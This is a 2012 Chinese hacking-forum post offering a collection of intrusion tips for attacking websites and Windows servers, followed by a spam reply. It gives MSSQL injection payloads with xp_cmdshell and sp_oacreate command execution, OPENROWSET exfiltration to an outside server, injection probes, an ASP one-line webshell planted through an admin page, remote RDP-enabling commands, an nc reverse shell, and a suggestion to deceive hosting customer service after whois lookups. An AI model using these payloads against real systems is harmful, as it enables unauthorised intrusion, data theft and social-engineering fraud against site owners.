找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3142|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
. g9 g6 E( m8 b$ j! j2 o/ {- x$ U1 U  v) Y$ v! |. T- T) E( S& @3 w

7 d, b! x+ h9 d. D/ U* ?  q) ZSA点数据库分离搞法+语句:
4 p( P& `9 G+ G/ J) M7 e
+ T! ~9 o" i  v& R, [1 c, {3 ~注射点不显错,执行下面三条语句页面都返回正常。; u7 _8 N9 M0 h0 Q' b$ u
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
& X( K" o% N3 _) b3 l4 n% R  Jand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')8 o- f7 X4 C9 j+ z2 w
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
( b3 Q6 `. Z2 Q, K* V% _) n1 q可以列目录,判断系统为2000,web与数据库分离4 m' ~  b9 C# A) w" A
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
' Y! ~1 }' y3 f7 g& o在注射点上执行
0 P# W" G  X5 R! O' l, Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
& {' J; L7 A' T, U8 L1 `页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
: I8 [& Z0 H1 z: D还有我用NC监听得其他端口都没有得到IP。
& w0 k; F+ N' r, _/ I5 R* p7 H" b1 _
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。9 Y3 ?2 G0 X# i. Y) p% U
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--  Y: V$ v9 h2 o( e  P9 }. h

2 L. h7 X2 i. F) Z2 G7 e8 t;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--/ _# P& y' p. w0 `
6 l% ?& c7 R/ `' T+ G
现在就猜想是不是数据库是内网而且不能连外网。
' G6 m& X( ]# V
9 v7 y% r' D& y8 ]& V: q4 v" m9 l" v$ g3 v6 v( L* {4 d" {% p
access导出txt文本代码  p: j3 M+ I7 }1 a
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
9 n& d* J' e0 A2 W5 `
0 @0 S# q9 l( X$ m0 Q; v" k3 z7 Z5 W# z) K! E' k8 b
8 A( Z0 N& J/ c4 I( C8 A4 m* R
自动跳转到指定网站代码头8 d0 l) ^3 E) J- R4 f* W
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>: O7 P/ E% P# p; k0 `! }4 `
9 m! F( J* I( ^9 b. V4 m6 }" ~

6 f# D1 Y0 K' t9 m入侵java or jsp站点时默认配置文件路径:3 t0 b$ Q8 B- a) T0 F
\web-inf\web.xml# P: h2 g& Z$ ~: ?7 v8 m* q; Y
tomcat下的配置文件位置:6 B4 ]  t* p1 @
\conf\server.xml            (前面加上tomcat路径)
1 z% I/ P8 ~0 D- V: v' \\Tomcat 5.0\webapps\root\web-inf\struts-config.xml) Q+ F9 p. S1 k2 @7 u/ I

5 a6 I3 [# v" j$ q( E3 `. Z+ u" [
+ C1 U  X5 S; }& }
; s, c* z2 y" g7 P$ m0 v8 T检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:3 G, Q0 [+ b: }7 j+ T
-1%238 L6 m. d) W4 ?9 \* @
>
  K+ A$ |7 W; h  v0 @. L% ]<) Q  k$ f9 T" f- y# T0 s+ F; W
1'+or+'1'='1# c" x3 N& W0 G6 W! |
id=8%bf
4 c/ |0 q  o# ~7 Q: J8 H0 s" G; w: X- K5 ~3 V
全新注入点检测试法:0 Q& D& p$ ^: Y( k
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。: I( v5 ^% A/ ~1 E& b& l5 P. n5 E

; S4 w. h. p* d7 N- f+ ~/ m, q! p在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
( U& R$ n2 G" p, f# _3 O; ]4 }5 a: ?, Y- v1 H
搜索型注入判断方法:
8 G. Z& K. B& x4 [北京%' and '1'='1' and '%'='
5 N+ f$ v6 _- b1 o北京%' and '1'='2' and '%'='0 e9 V4 K0 m  p. s3 k' y' P7 n
2 `2 H% m9 O( U) L- ?% n. a, i
/ U9 I+ H& F% v/ J
COOKIES注入:3 X5 `4 d% _2 w/ j' X% Y  X
& \4 P5 ?  w6 F) x+ b
javascript:alert(document.cookie="id="+escape("51 and 1=1"));7 I6 M8 f9 F5 }5 g6 s7 H
: d' L* W+ ]% j7 I& r+ C6 [
2000专业版查看本地登录用户命令:
4 b, P9 p" f, {net config workstation! [0 I% W& g; N
3 ?1 W) P( o: q, V2 |
- \' A/ b) I  s4 X: K( I8 [1 |
2003下查看ipsec配置和默认防火墙配置命令:
. G8 e+ @6 G. {/ Enetsh firewall show config
8 m% {; B# r! h% T, k& g7 {# Qnetsh ipsec static show all
9 J! y9 R2 H! k9 D9 `  B$ b5 {  K& C& s- M0 _5 U
不指派指定策略命令:
0 H7 _# ^; O5 Dnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)% F* \' m9 j2 Z% Y6 i
netsh ipsec static show policy all  显示策略名: B/ v! b% K8 J* v
* f3 n6 a* a* |) Q

8 C4 i* g: Y7 u7 ]( a# K3 A5 r/ g猜管理员后台小技巧:
4 H( v$ S" P0 O* n% A+ |admin/left.asp
5 v  g9 H1 n4 k2 i* y. ^& H' Badmin/main.asp; j) f+ m: [. y- H! ~$ S" I
admin/top.asp# Q' W0 K. h) ]" L
admin/admin.asp ' Q3 ]/ f4 q  G2 V  y3 ]) Z
会现出菜单导航,然后迅雷下载全部链接  z- G; ?% z" X& h5 X( G
! K, r' C* R1 N5 i3 T9 h

# Q4 p3 p+ a) O; U) n社会工程学:
; @( ?; x4 V0 c+ B用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
, @7 T* Z+ e5 r6 E; H1 L然后去骗客服: d, o1 |; j% K8 q! c2 ~

; u( H$ K" h8 z6 Y* n. ^
6 J' m3 G# u9 q. X' m& ?; z# U' ~6 |统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
, v, o* C( K4 Q4 [) P查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 8 m7 G# e7 E/ u' S- _, H. }, X! O4 U
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。( m, E+ T5 B6 }
7 d, j' O# i7 m6 v, H3 O" A9 u3 P
: l( m: V/ Z, l( e% _4 a/ \

! `0 ~8 J: W2 k; D4 h- n. ]6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)2 J0 W6 ]; b& p

3 g  B2 v8 {# x1 ], Q) k0 ?/ G; H
* N1 Q$ b6 [: U( U& ^, K, b: I5 C5 b8 G6 f4 c
CMD加密注册表位置: n& O" q2 r. _0 e3 W' l1 M( j* Y0 Q
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
  i2 p- ?3 {9 {& AAutoRun" y  @$ w- C5 ?1 O
/ W2 @& N! T5 D6 Q0 Q0 O# k' ^
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
4 {' h  a! x6 R; uAutoRun4 F5 }- {2 t. L3 J  V6 R1 B8 t2 A
" F; q: H% a6 o: V
  S' s/ S, q9 z( P
在找注入时搜索Hidden,把他改成test; K6 x2 p: {+ n& ~2 U
/ D/ @- w: ]% h3 p/ E) O

0 h4 ^+ J# J8 z
3 o8 P' E/ \5 G# L/ G& R4 H$ |% J5 nmstsc /v:IP /console ! E6 e0 ^+ n  z2 f3 h3 Q6 R1 A

- g, j: t9 U& |) v8 a" ?2 _. }
/ k% m1 D6 R9 T* `一句话开3389:1 [9 E0 t4 O6 e

# c' c0 @! c4 q最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  # y" H6 q6 E( ^; `
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.2 w/ j0 ?0 N, U7 f
& d# T! N6 S+ k! {8 |! S
3 k& ?0 m% _6 Q# g
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 Z# r% x8 p9 }# n/ v
Insert into admin(user,pwd) values('test','test')6 j% J0 l  B8 Q( G* E

  U* u" L7 j* I$ g: s
# c7 k7 g/ L$ W7 b2 KNC反弹
  C% A& N* @8 F$ P* T3 e+ l: H先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   8 h  Q+ L( m2 V; p; T0 A5 A/ Z
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
8 ?# }3 F( j4 h$ M! b& N
7 o6 M/ f9 U$ N# g0 c" e, x& w& K4 s& s/ U  q
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
# {) |5 v" t. T& Q; |' e* U6 g) r- n% }+ `, r
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
0 M6 \8 f" U0 J$ @例如:
% R  _. K4 {: |8 p- a2 i+ osubst k: d:\www\ 用d盘www目录替代k盘
% Z" i, S6 z; ^: x7 @- S/ rsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表